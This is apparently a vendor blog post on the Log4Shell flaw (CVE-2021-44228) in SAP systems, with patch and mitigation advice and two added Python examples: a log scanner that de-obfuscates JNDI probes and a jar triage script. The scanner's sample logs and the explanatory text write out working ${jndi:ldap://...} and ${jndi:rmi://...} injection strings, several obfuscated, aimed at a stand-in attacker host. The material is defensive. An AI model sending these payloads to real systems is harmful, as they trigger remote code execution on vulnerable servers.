Log4j Vulnerability and SAP (CVE-2021-44228)
On December 10th, 2021, Germany’s Federal Office for Information Security (BSI) raised its cyber security warning for the critical flaw in the widely used open-source Java logging library Apache Log4j to warning level red, and a lot has happened in the few days since. Log4j is the component that writes and formats log output in Java-based applications. While formatting a message, Log4j 2 resolves so-called lookups (expressions of the form ${...}), one of which is a JNDI lookup. An attacker who can get a crafted string such as ${jndi:ldap://<attacker host>/a} into any value that ends up in a log (a User-Agent header, a username, a search term) makes the application perform a JNDI query against an attacker-controlled LDAP (or RMI) server and load and execute the code that server returns.
The gap, now known as Log4Shell, thus gives an unauthenticated attacker remote code execution on the affected server, typically ending in an interactive shell on the compromised host, from which further attacks on internal systems can be launched.
Log4j 2 is used in a very large share of Java-based applications, so CVE-2021-44228 is present almost everywhere, and it is being actively exploited. It carries the maximum CVSSv3 base score of 10.0.
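The first thing most teams want after reading the above is a way to tell from their web server or application logs whether they were probed. The following is an added example written for this page (it is not code from Xiting, SAP or the Log4j project): a small Python detector that undoes the obfuscation attackers wrap around the ${jndi:...} lookup, namely Log4j's own nested lookups such as ${lower:j}, ${::-j} and ${env:NOPE:-j}, plus URL-encoding, and then reports the de-obfuscated payload. The log lines are constructed for the example, and 198.51.100.23 is a documentation address standing in for an attacker host.

```python
"""Added example (not from the original post): spot Log4Shell probes in log lines.

Attackers rarely send the plain ${jndi:ldap://...} string. They hide it behind
Log4j's own lookup syntax (${lower:j}, ${::-j}, ${env:NOPE:-j}) and behind
URL-encoding, so plain substring matching misses it. This normaliser folds those
tricks the way Log4j's StrSubstitutor would, then searches for the resulting
${jndi:...} lookup. All log lines below are constructed; 198.51.100.23 is a
documentation address standing in for an attacker host.
"""
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# An innermost lookup: "${...}" whose body contains no further "$", "{" or "}".
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# The lookup we are ultimately looking for, after de-obfuscation.
JNDI = re.compile(r"\$\{\s*jndi\s*:[^}]*\}", re.IGNORECASE)


def _resolve(body: str) -> Optional[str]:
    """Evaluate one innermost lookup body like Log4j would; None means 'leave it as is'."""
    if body.lstrip().lower().startswith("jndi"):
        return None                          # the payload itself: keep it for the detector
    if ":-" in body:                         # "${key:-default}" and "${::-x}" both yield the default
        return body.split(":-", 1)[1]
    prefix, sep, key = body.partition(":")
    if sep:
        p = prefix.strip().lower()
        if p == "lower":
            return key.lower()
        if p == "upper":
            return key.upper()
    return None                              # env:, sys:, date:, ...: not evaluated here, leave untouched


def _substitute(m) -> str:
    resolved = _resolve(m.group(1))
    return m.group(0) if resolved is None else resolved


def normalize(text: str) -> str:
    """URL-decode (repeatedly, for double encoding), then collapse nested lookups to a fixed point."""
    while True:
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    while True:
        folded = INNERMOST.sub(_substitute, text)
        if folded == text:                   # every resolved lookup shrinks the string, so this terminates
            return text
        text = folded


def detect(line: str) -> Optional[str]:
    """Return the de-obfuscated ${jndi:...} lookup hidden in a log line, or None."""
    m = JNDI.search(normalize(line))
    return m.group(0) if m else None


def scan(lines: List[str]) -> List[Tuple[int, str]]:
    """(line index, normalised payload) for every line that carries a JNDI lookup."""
    hits = []
    for i, line in enumerate(lines):
        payload = detect(line)
        if payload is not None:
            hits.append((i, payload))
    return hits


# Constructed sample: web server access log lines plus one application log line.
SAMPLE_LOG = [
    '10.0.0.5 - - [11/Dec/2021:02:14:33 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.23:1389/a}"',
    '10.0.0.5 - - [11/Dec/2021:02:14:34 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:ldap://198.51.100.23:1389/a}"',
    '10.0.0.5 - - [11/Dec/2021:02:14:35 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://198.51.100.23:1389/a}"',
    '10.0.0.5 - - [11/Dec/2021:02:14:36 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:NaN:-j}ndi:rmi://198.51.100.23:1099/a}"',
    '10.0.0.5 - - [11/Dec/2021:02:14:37 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.23%3A1389%2Fa%7D HTTP/1.1" 200 512 "-" "curl/7.79.1"',
    '10.0.0.9 - - [11/Dec/2021:02:14:38 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/95.0"',
    '2021-12-11 02:14:39 INFO  Loaded configuration from ${sys:user.home}/app.properties',
]

if __name__ == "__main__":
    for idx, payload in scan(SAMPLE_LOG):
        print(f"line {idx}: {payload}")
```

Running the script reports the first five sample lines with the same normalised payloads, while the ordinary browser line and the application line with a harmless ${sys:...} lookup stay quiet. The resolver deliberately evaluates only the lookup types that attackers use for obfuscation (defaults, lower, upper); anything else is left in place so that a benign lookup never hides or fabricates a hit. A hit in the logs means a probe reached the application, not that it succeeded; that question is answered by the outbound LDAP/RMI connections from the host in the same time window.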
SAP applications and application servers (on-premise and cloud) are also affected by this vulnerability. Software vendors such as SAP have already published statements on the extent to which their products are affected and have provided the corresponding patches. Here is a list of affected SAP applications, which SAP is constantly expanding: it shows which applications are currently not affected, where SAP has already applied patches and where patches are still missing. It also shows that SAP was able to act quickly, especially for its cloud products.
To close the gap in your own code, upgrade the log4j library: from Log4j 2.16.0 on, message lookups have been removed entirely and JNDI is disabled by default (2.15.0 only disabled the lookups by default and turned out to be an incomplete fix, tracked as CVE-2021-45046). Where an immediate upgrade is not possible, two mitigations exist, each tied to a version range: on 2.10 through 2.14.1 you can set the system property log4j2.formatMsgNoLookups to true (or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true); on any 2.x release, including those older than 2.10 where that property does not exist, you can delete the class org/apache/logging/log4j/core/lookup/JndiLookup.class from the log4j-core jar. The property alone was later shown to be insufficient in certain non-default configurations, so treat both mitigations as stopgaps until the upgrade is done. Based on current knowledge, all versions from 2.0-beta9 through 2.14.1 are affected.
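To make the version and mitigation checks above concrete, here is an added example written for this page (our own illustration, not SAP's or the Log4j project's code). It reads the version of a log4j-core jar from Maven's pom.properties (falling back to the manifest), checks whether JndiLookup.class is still inside, turns that into a verdict, and then applies the class-removal mitigation the way the shell one-liner zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class would. The jars it inspects are stand-ins constructed inside the example (placeholder class bytes, not a real Log4j build); nested jars inside WARs or fat jars are out of scope here and have to be unpacked first.

```python
"""Added example (not from the original post): triage a log4j-core jar for CVE-2021-44228.

Two checks a patch team actually runs on a host: which log4j-core version sits on
the classpath, and whether org/apache/logging/log4j/core/lookup/JndiLookup.class is
still inside the jar. remove_jndi_lookup() is the Python equivalent of the documented
shell mitigation: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
The jars built by make_demo_jar() are constructed stand-ins, not real Log4j builds.
"""
import os
import re
import tempfile
import zipfile
from typing import Optional, Tuple

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
# Maven writes the artifact version here in every log4j-core jar.
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"


def parse_version(v: str) -> Tuple[int, int, int]:
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0) (qualifier ignored)."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", v)
    if not m:
        raise ValueError(f"unparseable version {v!r}")
    return int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)


def jar_version(jar: zipfile.ZipFile) -> Optional[str]:
    """Read the artifact version from pom.properties, falling back to the manifest."""
    names = jar.namelist()
    if POM_PROPS in names:
        for line in jar.read(POM_PROPS).decode().splitlines():
            if line.startswith("version="):
                return line.split("=", 1)[1].strip()
    if "META-INF/MANIFEST.MF" in names:
        for line in jar.read("META-INF/MANIFEST.MF").decode().splitlines():
            if line.startswith("Implementation-Version:"):
                return line.split(":", 1)[1].strip()
    return None


def classify(version: Optional[str], has_jndi_lookup: bool) -> str:
    """Verdict for CVE-2021-44228 from the version and the presence of JndiLookup.class."""
    if version is None:
        return "unknown version: inspect manually"
    major, minor, _ = parse_version(version)
    if major != 2:
        return "not log4j 2.x: CVE-2021-44228 does not apply (log4j 1.x is end-of-life, though)"
    if (major, minor) >= (2, 16):
        return "fixed: 2.16.0 or later (message lookups removed, JNDI off by default)"
    if (major, minor) == (2, 15):
        return "incomplete fix (2.15.0, see CVE-2021-45046): upgrade"
    if not has_jndi_lookup:
        return "vulnerable version, but JndiLookup.class removed: mitigated, still upgrade"
    return "VULNERABLE: upgrade, or remove JndiLookup.class (2.10+: log4j2.formatMsgNoLookups=true as a stopgap)"


def inspect_jar(path: str) -> dict:
    """Version, JndiLookup presence and verdict for one jar on disk."""
    with zipfile.ZipFile(path) as jar:
        version = jar_version(jar)
        has_jndi = JNDI_CLASS in jar.namelist()
    return {"path": path, "version": version, "has_jndi_lookup": has_jndi,
            "verdict": classify(version, has_jndi)}


def remove_jndi_lookup(path: str) -> None:
    """Rewrite the jar without JndiLookup.class (zip cannot delete in place either)."""
    tmp = path + ".tmp"
    with zipfile.ZipFile(path) as src, zipfile.ZipFile(tmp, "w", zipfile.ZIP_DEFLATED) as dst:
        for info in src.infolist():
            if info.filename != JNDI_CLASS:
                dst.writestr(info, src.read(info.filename))
    os.replace(tmp, path)


def make_demo_jar(path: str, version: str) -> None:
    """Build a constructed stand-in jar containing only the entries the checks look at."""
    with zipfile.ZipFile(path, "w") as jar:
        jar.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        jar.writestr(POM_PROPS, f"version={version}\ngroupId=org.apache.logging.log4j\nartifactId=log4j-core\n")
        jar.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only: a placeholder, not real bytecode
        jar.writestr("org/apache/logging/log4j/core/Logger.class", b"\xca\xfe\xba\xbe")


def demo() -> dict:
    """Triage a constructed 2.14.1 jar, apply the class-removal mitigation, triage again."""
    with tempfile.TemporaryDirectory() as d:
        jar = os.path.join(d, "log4j-core-2.14.1.jar")
        make_demo_jar(jar, "2.14.1")
        before = inspect_jar(jar)
        remove_jndi_lookup(jar)
        after = inspect_jar(jar)
    return {"before": before, "after": after}


if __name__ == "__main__":
    for stage, r in demo().items():
        print(f"{stage:6s} version={r['version']} JndiLookup={r['has_jndi_lookup']} -> {r['verdict']}")
```

Pointed at real jars (for example every log4j-core-*.jar that find turns up under the SAP or application server installation), inspect_jar() gives the same three fields per file. Two things the verdict cannot see: a jar whose pom.properties was stripped by a shading or repackaging step needs the manual path, and an application may bundle a second, older log4j-core inside a WAR or fat jar, so the scan has to descend into those archives as well.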
It is of course difficult to assess the exact impact of this vulnerability on companies using SAP, but the situation shows once again that companies which have implemented adequate basic security measures will not lose sleep over this issue. Many companies running SAP, however, have not implemented even rudimentary security measures, for reasons such as time, cost or lack of knowledge.
Many attacks at the network level via compromised hosts, possibly launched directly from the intranet, can be prevented with measures such as network segmentation or micro-segmentation together with correctly configured firewalls. For Log4Shell in particular, the exploited system has to open an outbound connection to the attacker’s LDAP or RMI server and then fetch the malicious class from it, which a server in a properly designed zone should not be able to do in the first place. One caveat: egress filtering stops the code-loading stage, but a vulnerable application still evaluates the lookup, so an attacker can leak data such as environment variables through DNS queries to a domain under their control; egress filtering is a strong mitigation, not a substitute for the patch. Basic network security and a clean zone concept are nevertheless of great help here.
These measures, combined with token-based login to the SAP system (SSO), properly authorized SAP roles and RFC interfaces, and security monitoring of your SAP landscape, already offer solid protection against many potential attacks. Such monitoring should also recognize whether the SAP message server and the ACLs of the SAP gateways are properly configured, whether internal server communication has been secured in accordance with SAP Note 2040644, whether TLS and SNC encryption are in place, and much more.
What you can do
Xiting is a highly specialized SAP solution provider with an extensive service portfolio in the SAP security area. In light of current events, we asked ourselves what practical solutions we can offer our customers and interested parties. The Security Architect module, integrated in the Xiting Authorizations Management Suite (XAMS), assists in this matter and can also be used as a monitoring tool in a SIEM environment.
In addition, it is important to activate the mechanisms that the SAP system already provides, such as encryption and the other available hardening options. Over the past few years, we have built up extensive know-how in this area together with our security experts.
If you are in doubt or have any questions regarding further security measures, talk to us. Based on an extensive system check, we can provide you with valuable information on how to increase your security and your protection against future attacks.
Find out more about our services here:
- Secure interfaces
- Security check of your SAP systems
- Security Support